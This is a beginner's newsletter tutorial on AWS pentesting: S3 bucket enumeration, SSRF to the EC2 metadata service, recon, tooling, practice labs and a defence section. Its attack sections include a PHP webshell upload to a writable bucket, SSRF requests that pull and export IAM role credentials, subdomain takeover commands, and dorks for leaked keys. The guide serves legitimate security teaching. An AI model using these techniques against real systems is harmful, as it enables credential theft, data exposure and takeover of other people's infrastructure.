AWS for Pentesters: Your First Steps into Cloud Hacking

18 min read

December 14, 2025


👋 Introduction

Hey everyone!

I’ll be honest. I’m writing this newsletter because I need to learn AWS myself.

I’m currently working on a project that involves cloud infrastructure, and I can’t keep avoiding AWS anymore. For the longest time, I stayed in my comfort zone (web apps, APIs, smart contracts) but cloud security? That felt like a different world. IAM, EC2, S3, VPC, KMS, Lambda… it’s overwhelming when you’re starting from zero.

But here’s the thing: I can’t audit what I don’t understand. And judging by the number of cloud breaches I keep reading about (Capital One, Uber, countless exposed S3 buckets), this knowledge is essential for modern pentesting.

So I’m taking the approach I always do when learning something new: I document it and share it. This newsletter is as much for me as it is for you. I’m breaking down AWS security from the perspective of someone who’s never touched it before, because that’s exactly where I am.

What I’ve learned so far is encouraging: you don’t need to be a cloud architect to find cloud vulnerabilities. Most AWS security issues aren’t about complex IAM policies or sophisticated privilege escalation chains. They’re misconfigurations. Public S3 buckets. Exposed metadata services. Overly permissive policies. The kind of stuff you can find with basic reconnaissance and a few simple commands.

The barrier to entry is low. You don’t need an AWS account to test many attack vectors. And the free tier is enough to set up your own vulnerable environments for practice.

If you’re in the same boat (comfortable with traditional pentesting but intimidated by cloud) this is your starting point. Let’s learn this together.

In this issue, I’ll cover:

  • AWS basics for pentesters (regions, services, IAM fundamentals)
  • S3 bucket enumeration and exploitation (the most common cloud vulnerability)
  • SSRF to AWS metadata service (stealing credentials from EC2 instances)
  • Basic AWS reconnaissance (finding cloud resources from external perspective)
  • Tools and techniques for cloud security testing
  • Hands-on labs to practice these skills

If you’ve never touched AWS but want to start finding cloud vulnerabilities, you’re in the right place. No prior cloud experience required.

Let’s get started 👇

☁️ AWS 101: What Pentesters Need to Know

Before breaking things, let’s understand what you’re dealing with.

What is AWS?

Amazon Web Services (AWS) is a cloud computing platform. Instead of companies running their own servers, they rent virtual machines, storage, and services from Amazon’s data centers.

Think of it like this:

  • Traditional infrastructure: Company buys servers, racks them, manages networking, storage, backups, etc.
  • Cloud infrastructure: Company clicks a button, AWS provisions a server in seconds, company pays by the hour

For pentesters, this means:

  • Target infrastructure is dynamic: Servers spin up and down constantly
  • Misconfigurations are common: Developers often prioritize speed over security
  • Attack surface is public: Many services have public endpoints by default

Key AWS Services (Security Perspective)

You don’t need to memorize all 200+ AWS services. Focus on these:

S3 (Simple Storage Service): Object storage. Think Dropbox for developers. Files are stored in “buckets” that can be public or private. Most common misconfiguration in AWS.

EC2 (Elastic Compute Cloud): Virtual machines. Servers running in AWS. Can be Linux or Windows.

IAM (Identity and Access Management): Controls who can do what in AWS. Users, roles, policies. Critical for understanding privilege escalation.

Lambda: Serverless functions. Code that runs without a dedicated server. Can have overly permissive permissions.

RDS (Relational Database Service): Managed databases (MySQL, PostgreSQL, etc.). Sometimes publicly accessible.

CloudFront: Content Delivery Network (CDN). Can lead to subdomain takeovers.

Route 53: DNS service. Useful for reconnaissance.

AWS Regions and Availability Zones

AWS is organized geographically:

  • Region: A physical location with multiple data centers (e.g., us-east-1 = Northern Virginia, eu-west-1 = Ireland)
  • Availability Zone (AZ): One or more discrete data centers within a region

Why this matters for pentesters:

  • Resources in different regions are isolated
  • S3 bucket names are global, but buckets themselves are region-specific
  • When enumerating, you might need to check multiple regions

Common regions:

  • us-east-1: US East (N. Virginia) - Most common, default for many services
  • us-west-2: US West (Oregon)
  • eu-west-1: Europe (Ireland)
  • ap-southeast-1: Asia Pacific (Singapore)

IAM: The Backbone of AWS Security

IAM controls access in AWS. Understanding IAM is essential for cloud pentesting.

IAM Components:

Users: Individual accounts (e.g., john@company.com)

Groups: Collections of users with shared permissions

Roles: Identity that AWS resources can assume (e.g., EC2 instance role)

Policies: JSON documents that define permissions

Example IAM Policy:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::my-bucket/*"
    }
  ]
}

This policy allows reading objects from the bucket my-bucket.

Key IAM Concepts:

  • ARN (Amazon Resource Name): Unique identifier for AWS resources

    • Format: arn:aws:service:region:account-id:resource
    • Example: arn:aws:s3:::my-bucket
  • Principal: Entity making the request (user, role, service)

  • Permissions boundary: Maximum permissions a user can have
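When triaging leaked policies or logs, it helps to break ARNs into their fields. A minimal sketch (`parse_arn` is my own helper, not an AWS tool; it just splits on the format above):

```shell
# Split an ARN into its components, following the documented
# arn:partition:service:region:account-id:resource layout.
parse_arn() {
  oldifs=$IFS
  IFS=':'
  set -- $1
  IFS=$oldifs
  echo "partition=$2 service=$3 region=$4 account=$5 resource=$6"
}

parse_arn "arn:aws:s3:::my-bucket"
# -> partition=aws service=s3 region= account= resource=my-bucket
# S3 ARNs leave region and account ID empty because bucket names are global.
```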

From an attacker perspective:

  • Misconfigured IAM policies can grant excessive permissions
  • Roles with overly broad permissions are gold
  • Credential leaks (access keys) are common

AWS Access Credentials

There are two types of credentials:

1. Root Account Credentials:

  • Email and password for the AWS account
  • Full access to everything
  • Should never be used for day-to-day operations (but often is)

2. IAM Access Keys:

  • Programmatic access credentials
  • Consist of:
    • Access Key ID: Like a username (e.g., AKIAIOSFODNN7EXAMPLE)
    • Secret Access Key: Like a password (e.g., wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY)

Long-term access keys start with AKIA (IAM users, root account). If you see AKIA in source code, logs, or JavaScript, that’s an AWS access key leak.

Security Token Service (STS) Temporary Credentials:

  • Temporary credentials with an expiration (typically 15 minutes to 12 hours, depending on how they are issued)
  • Access Key ID starts with ASIA (not AKIA)
  • Include: Access Key ID, Secret Access Key, Session Token
  • Session token is required for all API calls
  • Commonly used by EC2 instance roles, Lambda functions, federated users
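A tiny helper makes this triage mechanical when sifting through leaked strings. A sketch (`classify_key` is a name I made up, not a standard tool):

```shell
# Classify an AWS access key ID by its prefix.
classify_key() {
  case "$1" in
    AKIA*) echo "long-term key (IAM user or root) - no session token needed" ;;
    ASIA*) echo "temporary STS key - session token required" ;;
    *)     echo "not a recognized access key ID prefix" ;;
  esac
}

classify_key "AKIAIOSFODNN7EXAMPLE"
# -> long-term key (IAM user or root) - no session token needed
classify_key "ASIAXXXXXXXXXXX"
# -> temporary STS key - session token required
```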

🪣 S3 Buckets: The Low-Hanging Fruit

S3 is the most common attack vector in AWS. Why? Because it’s easy to misconfigure and the impact is often massive.

What Makes S3 Dangerous?

S3 buckets can be:

  • Public: Anyone on the internet can list and download files
  • Authenticated: Only AWS users can access
  • Private: Only specific IAM users/roles can access

The problem? Developers often make buckets public by accident or “temporarily” and forget to lock them down.

S3 Bucket URL Formats

Buckets can be accessed via multiple URL formats:

Path-style (legacy):

https://s3.amazonaws.com/bucket-name/file.txt
https://s3-region.amazonaws.com/bucket-name/file.txt

Virtual-hosted style (current standard):

https://bucket-name.s3.amazonaws.com/file.txt
https://bucket-name.s3-region.amazonaws.com/file.txt

Website hosting:

http://bucket-name.s3-website-region.amazonaws.com/
http://bucket-name.s3-website.region.amazonaws.com/
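Because the formats are predictable, you can generate every candidate URL for a bucket name with a few lines of shell. A sketch (`bucket_urls` is a hypothetical helper; defaulting to us-east-1 is an assumption, adjust per target):

```shell
# Emit the candidate URLs for a bucket name, covering path-style,
# virtual-hosted, and website-hosting formats.
bucket_urls() {
  b=$1
  r=${2:-us-east-1}  # assumed default region
  echo "https://s3.amazonaws.com/$b/"
  echo "https://$b.s3.amazonaws.com/"
  echo "https://$b.s3.$r.amazonaws.com/"
  echo "http://$b.s3-website-$r.amazonaws.com/"
}

bucket_urls company-assets
# Feed each line to curl to see which format responds.
```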

Finding S3 Buckets

1. Look for S3 URLs in Target Applications

Check:

  • JavaScript files
  • Image/CSS/font URLs
  • API responses
  • Mobile app decompilation
  • HTML source code

Example finding:

// Found in app.js
const API_URL = "https://company-api-prod.s3.amazonaws.com/config.json";

2. Enumerate Based on Company Name

S3 bucket names are globally unique and often follow patterns:

Common naming patterns:

company-name
company-name-prod
company-name-dev
company-name-staging
company-uploads
company-backups
company-logs
company-assets
company-static
www.company.com
dev.company.com
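These patterns are easy to turn into a wordlist. A minimal generator sketch (extend the suffix list for your target):

```shell
# Generate candidate bucket names from common naming patterns.
gen_bucket_names() {
  name=$1
  for suffix in "" -prod -dev -staging -uploads -backups -logs -assets -static; do
    echo "${name}${suffix}"
  done
}

gen_bucket_names company-name
# Pipe into your checker of choice, e.g.:
#   gen_bucket_names company-name | while read b; do
#     aws s3 ls "s3://$b" --no-sign-request >/dev/null 2>&1 && echo "HIT: $b"
#   done
```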

3. Subdomain Enumeration

Use subdomain enumeration tools and check if subdomains point to S3:

# Using amass
amass enum -d target.com -o subdomains.txt

# Check each subdomain for S3
while read sub; do
  host $sub | grep -i "s3"
done < subdomains.txt

If you see:

dev.company.com is an alias for dev-company.s3.amazonaws.com

That’s an S3 bucket.

Testing S3 Bucket Access

Once you find a bucket name, test if it’s accessible:

Method 1: Browser

Try accessing:

https://bucket-name.s3.amazonaws.com/

If you get an XML listing, it’s public:

<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult>
  <Name>bucket-name</Name>
  <Contents>
    <Key>file1.txt</Key>
    ...
  </Contents>
</ListBucketResult>

If you get AccessDenied, it exists but isn’t publicly listable (might still have public files).

If you get NoSuchBucket, it doesn’t exist.
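The three cases can be distinguished mechanically from the response body. A sketch (`classify_s3_response` is a hypothetical helper; pair it with curl against the bucket URL):

```shell
# Classify the body of an unauthenticated bucket request.
classify_s3_response() {
  case "$1" in
    *"<ListBucketResult"*) echo "public: bucket is listable" ;;
    *AccessDenied*)        echo "exists, but listing denied (objects may still be public)" ;;
    *NoSuchBucket*)        echo "bucket does not exist" ;;
    *)                     echo "unrecognized response" ;;
  esac
}

# Example usage (network call, so shown commented out):
# body=$(curl -s "https://bucket-name.s3.amazonaws.com/")
# classify_s3_response "$body"
```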

Method 2: AWS CLI

Install AWS CLI (no credentials needed for public buckets):

# List bucket contents
aws s3 ls s3://bucket-name --no-sign-request

# Download a file
aws s3 cp s3://bucket-name/file.txt ./file.txt --no-sign-request

# Sync entire bucket
aws s3 sync s3://bucket-name ./local-folder --no-sign-request

The --no-sign-request flag attempts anonymous access.

S3 Permissions: Read vs Write

Buckets can have different permission combinations:

Public Read: Can list and download files (most common misconfiguration)

Public Write: Can upload files (rare but critical)

Test write access:

# Try to upload a file
echo "test" > test.txt
aws s3 cp test.txt s3://bucket-name/test.txt --no-sign-request

If successful, you can:

  • Upload webshells to static website buckets
  • Overwrite critical files
  • Inject malicious content

Public Read ACL: Can read the bucket’s access control list

aws s3api get-bucket-acl --bucket bucket-name --no-sign-request

Real-World S3 Exploitation Examples

Scenario 1: Public Backup Bucket

aws s3 ls s3://company-backups --no-sign-request

# Output:
# database-backup-2025-12-01.sql.gz
# application-secrets.env
# id_rsa

You just found database backups, environment variables with API keys, and SSH private keys.

Scenario 2: Public Upload Bucket with Website Hosting

# Check if bucket hosts a static website
curl http://company-uploads.s3-website-us-east-1.amazonaws.com

# Upload a webshell
echo '<?php system($_GET["c"]); ?>' > shell.php
aws s3 cp shell.php s3://company-uploads/shell.php --no-sign-request

# Access it
curl http://company-uploads.s3-website-us-east-1.amazonaws.com/shell.php?c=whoami

Scenario 3: Subdomain Takeover via S3

If a DNS record points to a non-existent S3 bucket, you can create it and take over the subdomain:

dev.company.com CNAME dev-company.s3.amazonaws.com

If dev-company bucket doesn’t exist, create it:

aws s3 mb s3://dev-company --region us-east-1
echo "Subdomain Takeover PoC" > index.html
aws s3 cp index.html s3://dev-company/index.html
aws s3 website s3://dev-company --index-document index.html

Now dev.company.com serves your content.

Impact: Phishing, XSS (if parent domain cookies aren’t properly scoped), reputation damage.

🔍 EC2 Metadata Service: SSRF to Credentials

If you find an SSRF (Server-Side Request Forgery) vulnerability in an application running on AWS EC2, you can steal credentials.

Note: For a comprehensive guide on finding and exploiting SSRF vulnerabilities, check out Issue 4: Inside the Request - From Basic SSRF to Internal Takeover, where I cover SSRF fundamentals, detection techniques, and exploitation methods. This section focuses specifically on exploiting SSRF in AWS environments to access the metadata service.

What is the EC2 Metadata Service?

Every EC2 instance has access to a special internal endpoint that provides metadata about the instance:

http://169.254.169.254/

This endpoint is only accessible from within the EC2 instance. External users can’t reach it directly. But if the application has SSRF, you can.

What’s Available in Metadata?

The metadata service exposes:

  • Instance details (AMI ID, instance type, region)
  • IAM role credentials (if the instance has a role attached)
  • User data (startup scripts, sometimes contains secrets)
  • Network information

Why this matters:

  • If the EC2 instance has an IAM role, you can steal temporary credentials
  • Those credentials grant whatever permissions the role has
  • Common scenario: EC2 role has S3 read/write, database access, Lambda invoke, etc.

Metadata Service Versions

IMDSv1 (Instance Metadata Service Version 1):

  • Simple HTTP GET requests
  • No authentication required
  • Easy to exploit via SSRF

IMDSv2 (Instance Metadata Service Version 2):

  • Requires a session token
  • Token obtained via HTTP PUT with custom header
  • Harder to exploit (but still possible)

Exploiting IMDSv1 via SSRF

Assume you found an SSRF vulnerability where you can control a URL parameter:

https://target.com/api/fetch?url=<YOUR_URL>

Step 1: Confirm Metadata Access

https://target.com/api/fetch?url=http://169.254.169.254/latest/meta-data/

If you get a response like:

ami-id
hostname
iam/
instance-id
local-ipv4
public-ipv4

You’ve hit the metadata service.

Step 2: Check for IAM Role

https://target.com/api/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

If the instance has a role, you’ll see the role name:

web-server-role

Step 3: Retrieve Credentials

https://target.com/api/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/web-server-role

Response:

{
  "AccessKeyId": "ASIAXXXXXXXXXXX",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "Token": "IQoJb3JpZ2luX2VjEH...",
  "Expiration": "2025-12-14T12:00:00Z"
}

You now have temporary AWS credentials. Note the ASIA prefix indicating temporary credentials.
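Turning that JSON into export statements can be scripted. A rough sketch using sed (jq is cleaner if available; this assumes the exact field names the metadata service returns, as shown above):

```shell
# Convert the metadata service's credentials JSON into export statements.
# Crude line-based extraction for the known response shape; not a general
# JSON parser.
creds_to_exports() {
  printf '%s\n' "$1" | sed -n \
    -e 's/.*"AccessKeyId" *: *"\([^"]*\)".*/export AWS_ACCESS_KEY_ID="\1"/p' \
    -e 's/.*"SecretAccessKey" *: *"\([^"]*\)".*/export AWS_SECRET_ACCESS_KEY="\1"/p' \
    -e 's/.*"Token" *: *"\([^"]*\)".*/export AWS_SESSION_TOKEN="\1"/p'
}

# Example usage (network call, so shown commented out):
# creds=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/web-server-role)
# eval "$(creds_to_exports "$creds")"
```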

Step 4: Use the Credentials

Export them locally:

export AWS_ACCESS_KEY_ID="ASIAXXXXXXXXXXX"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjEH..."

Test what permissions you have:

# Check identity
aws sts get-caller-identity

# List S3 buckets
aws s3 ls

# Enumerate permissions (requires additional tools)

Step 5: Enumerate Permissions

Once you have credentials, you need to discover what permissions they have. You can brute-force IAM permissions using enumeration tools (covered in the Tools section below) to systematically test what actions the role can perform.

Exploiting IMDSv2

IMDSv2 requires a token. To get the token, you must:

  1. Send a PUT request to /latest/api/token with header X-aws-ec2-metadata-token-ttl-seconds
  2. Use the returned token in subsequent requests with header X-aws-ec2-metadata-token

Challenge: Most SSRF vulnerabilities only allow GET requests, not PUT.

Workarounds:

  • If SSRF allows custom headers, you can still exploit IMDSv2
  • Some SSRF bypasses allow HTTP verb tampering
  • Look for chained vulnerabilities (SSRF + CRLF injection)

Example with custom headers (if allowed):

PUT /latest/api/token HTTP/1.1
Host: 169.254.169.254
X-aws-ec2-metadata-token-ttl-seconds: 21600

Then include the returned token in the follow-up metadata request:

GET /latest/meta-data/iam/security-credentials/ HTTP/1.1
Host: 169.254.169.254
X-aws-ec2-metadata-token: <token>

User Data Exposure

EC2 instances can have “user data” scripts that run on startup. These sometimes contain secrets:

http://169.254.169.254/latest/user-data

Response might include:

#!/bin/bash
export DB_PASSWORD="super_secret_password"
export API_KEY="sk_live_XXXXXXX"
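Grepping retrieved user data for secret indicators speeds up triage. A sketch (the pattern list is a starting point, not exhaustive):

```shell
# Flag lines in user data that look like secrets (with line numbers).
scan_user_data() {
  printf '%s\n' "$1" | grep -niE 'password|secret|api[_-]?key|token|AKIA|PRIVATE KEY'
}

# Example usage (network call, so shown commented out):
# userdata=$(curl -s http://169.254.169.254/latest/user-data)
# scan_user_data "$userdata"
```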

🔎 AWS Reconnaissance from External Perspective

You don’t need AWS credentials to enumerate resources. Here’s what you can find from outside.

DNS Enumeration

Find subdomains that point to AWS services:

# Subdomain enumeration
amass enum -d target.com -o subs.txt
subfinder -d target.com -o subs.txt

# Check for AWS services
while read sub; do
  dig $sub | grep -E 's3|cloudfront|elb|ec2'
done < subs.txt

Look for:

  • S3: s3.amazonaws.com, s3-website
  • CloudFront: cloudfront.net
  • ELB (Load Balancer): elb.amazonaws.com (e.g., name-123456.us-east-1.elb.amazonaws.com)

Certificate Transparency Logs

Services like crt.sh and Censys index SSL certificates. AWS services often appear here:

curl -s "https://crt.sh/?q=%.target.com&output=json" | jq -r '.[].name_value' | sort -u

Look for S3 bucket names in certificate SANs.

Shodan and Censys

Search for AWS-related services:

Shodan queries:

org:"Amazon.com" hostname:target.com
"Access Key ID" "Secret Access Key"

Censys queries:

parsed.names:target.com and tags:s3

GitHub Recon

Developers often commit AWS credentials and bucket names:

GitHub Dorks:

org:target-company "AKIA"
org:target-company "ASIA"
org:target-company "aws_secret_access_key"
org:target-company "s3.amazonaws.com"
filename:.env "AWS"

Use automated secret scanning tools (covered in Tools section) to efficiently scan repositories for leaked credentials.

Network Reconnaissance

Scan for open ports on EC2 instances:

# Find EC2 IP ranges for a region
curl -s https://ip-ranges.amazonaws.com/ip-ranges.json | \
  jq -r '.prefixes[] | select(.region=="us-east-1" and .service=="EC2") | .ip_prefix'

# Scan target IPs
nmap -sV -p 22,80,443,3389,3306,5432,6379,27017 target-ip

Common misconfigurations:

  • Port 22 (SSH) open to 0.0.0.0/0
  • Port 3306 (MySQL) or 5432 (PostgreSQL) publicly accessible
  • Port 6379 (Redis) without authentication

🛠️ Essential Tools for AWS Pentesting

Reconnaissance and Enumeration

ScoutSuite: Multi-cloud security auditing tool

pip install scoutsuite
scout aws --profile <profile-name>

Generates an HTML report with findings across IAM, S3, EC2, RDS, etc.

Prowler: AWS security assessment tool

pip install prowler
prowler aws --compliance cis_2.0

CloudMapper: Visualize AWS environments

git clone https://github.com/duo-labs/cloudmapper
cd cloudmapper
python cloudmapper.py collect --account my-account
python cloudmapper.py prepare --account my-account
python cloudmapper.py webserver

Exploitation and Post-Exploitation

Pacu: AWS exploitation framework (like Metasploit for AWS)

git clone https://github.com/RhinoSecurityLabs/pacu
cd pacu
bash install.sh
python pacu.py

Features:

  • Privilege escalation modules
  • Credential harvesting
  • Service enumeration
  • Data exfiltration

WeirdAAL: AWS attack library

git clone https://github.com/carnal0wnage/weirdAAL
cd weirdAAL
python weirdAAL.py -m list_modules

S3 Bucket Enumeration

S3Scanner: Check S3 bucket permissions

pip install s3scanner
s3scanner scan --buckets-file bucket-names.txt

cloud_enum: Multi-cloud OSINT tool

python3 cloud_enum.py -k company-name

bucket-stream: Real-time S3 bucket discovery from certificate transparency logs

slurp: S3 bucket enumerator

slurp domain -t company.com

AWSBucketDump: S3 bucket enumeration and download tool

python AWSBucketDump.py -l bucket-names.txt -g

IAM Permission Enumeration

enumerate-iam: Brute-force IAM permissions

python enumerate-iam.py --access-key ASIAXXX --secret-key wJalr... --session-token IQoJ...

Credential Scanning

GitLeaks: Find secrets in git repos

gitleaks detect --source . --report-path report.json

TruffleHog: High-entropy string scanner

trufflehog git https://github.com/target/repo

GitRob: Find sensitive files in GitHub organizations

AWS CLI Essentials

The AWS CLI is your best friend:

# Install
pip install awscli

# Configure (if you have credentials)
aws configure

# Basic commands
aws sts get-caller-identity  # Who am I?
aws s3 ls                     # List S3 buckets
aws ec2 describe-instances    # List EC2 instances
aws iam list-users            # List IAM users
aws iam get-user              # Get current user details

🧪 Hands-On Labs

Practice safely in controlled environments:

flAWS.cloud

Free AWS security challenges:

  • Early levels: S3 bucket misconfigurations and leaked access keys
  • Later levels: snapshot exposure, metadata service exploitation, and overly permissive IAM policies

No AWS account required for early levels.

flAWS2.cloud

Sequel to flAWS with defender and attacker paths.

CloudGoat

Vulnerable-by-design AWS infrastructure:

git clone https://github.com/RhinoSecurityLabs/cloudgoat
cd cloudgoat
pip install -r requirements.txt
python cloudgoat.py config profile
python cloudgoat.py config whitelist --auto
python cloudgoat.py create iam_privesc_by_rollback

Requires your own AWS account (uses free tier resources).

Scenarios include:

  • IAM privilege escalation
  • Lambda function exploitation
  • EC2 SSRF to metadata
  • S3 bucket enumeration

TryHackMe - AWS Security

Search for “AWS” on TryHackMe for guided rooms.

PentesterLab - AWS Badge

Paid platform with structured AWS security exercises.

🔒 Detection and Defense

For Blue Teams

1. Monitor CloudTrail Logs

AWS CloudTrail logs all API calls. Enable it and monitor for:

  • GetObject on sensitive S3 buckets from unknown IPs
  • AssumeRole from unexpected sources
  • Failed authentication attempts
  • Enumeration activities (rapid Describe* calls)

2. Enable S3 Block Public Access

At the account level:

aws s3control put-public-access-block \
  --account-id <account-id> \
  --public-access-block-configuration BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true

3. Enforce IMDSv2

Disable IMDSv1 on all EC2 instances:

aws ec2 modify-instance-metadata-options \
  --instance-id i-1234567890abcdef0 \
  --http-tokens required \
  --http-endpoint enabled

4. Use AWS IAM Access Analyzer

Automatically identifies resources shared with external entities:

aws accessanalyzer create-analyzer --analyzer-name my-analyzer --type ACCOUNT

5. Implement Least Privilege IAM Policies

Avoid wildcard permissions:

{
  "Effect": "Allow",
  "Action": "*",
  "Resource": "*"
}

Instead, grant specific permissions:

{
  "Effect": "Allow",
  "Action": ["s3:GetObject", "s3:PutObject"],
  "Resource": "arn:aws:s3:::my-bucket/*"
}

6. Enable MFA for IAM Users

Require MFA for console access and sensitive API calls.

7. Rotate Access Keys Regularly

Old, forgotten access keys are a common entry point.
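Key age is easy to compute from the CreateDate timestamps that aws iam list-access-keys returns. A sketch assuming GNU date (Linux):

```shell
# Age of an access key in whole days, given its ISO-8601 CreateDate.
# Assumes GNU date (Linux); BSD/macOS date parses dates differently.
key_age_days() {
  created=$(date -d "$1" +%s)
  now=$(date +%s)
  echo $(( (now - created) / 86400 ))
}

# Example: flag keys older than 90 days (requires credentials, so commented out):
# aws iam list-access-keys --query 'AccessKeyMetadata[].[AccessKeyId,CreateDate]' --output text | \
#   while read key created; do
#     [ "$(key_age_days "$created")" -gt 90 ] && echo "ROTATE: $key"
#   done
```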

8. Use AWS Config

Monitor resource configuration changes and compliance:

aws configservice put-configuration-recorder \
  --configuration-recorder name=default,roleARN=arn:aws:iam::account:role/config-role

For Developers

Secure S3 Buckets:

  • Never make buckets public unless absolutely necessary
  • Use bucket policies with specific IP restrictions
  • Enable versioning and logging
  • Use pre-signed URLs for temporary access

Protect Against SSRF:

  • Validate and sanitize all URLs
  • Use allowlists, not denylists
  • Block access to metadata service (169.254.169.254)
  • Implement network-level controls

Don’t Hardcode Credentials:

  • Use IAM roles for EC2/Lambda
  • Use AWS Secrets Manager or Parameter Store
  • Never commit credentials to git

🎯 Key Takeaways

  • AWS is not inherently insecure, but misconfigurations are everywhere
  • S3 buckets are the most common AWS vulnerability due to public access misconfigurations
  • SSRF to EC2 metadata service can leak IAM credentials, granting access to other AWS resources
  • You don’t need AWS credentials to enumerate many resources via DNS, certificate transparency, and public APIs
  • Subdomain takeovers via S3 are common when DNS records point to non-existent buckets
  • IMDSv2 makes metadata exploitation harder but not impossible
  • Defense requires proactive monitoring, least privilege IAM, and blocking public access by default
  • CloudTrail, Config, and IAM Access Analyzer are essential for visibility and compliance

That’s it for this week!

If you’ve been avoiding AWS pentesting because it felt overwhelming, I hope this demystifies it. Start simple. Enumerate S3 buckets on your next target. Test for SSRF and try hitting the metadata service. Use the free flAWS.cloud labs to practice.

Cloud security is a massive field, but you don’t need to know everything to find high-impact vulnerabilities. Focus on the basics: S3, IAM, and SSRF. You’ll be surprised how often these simple techniques work.

Thanks for reading, and happy hacking ☁️

— Ruben
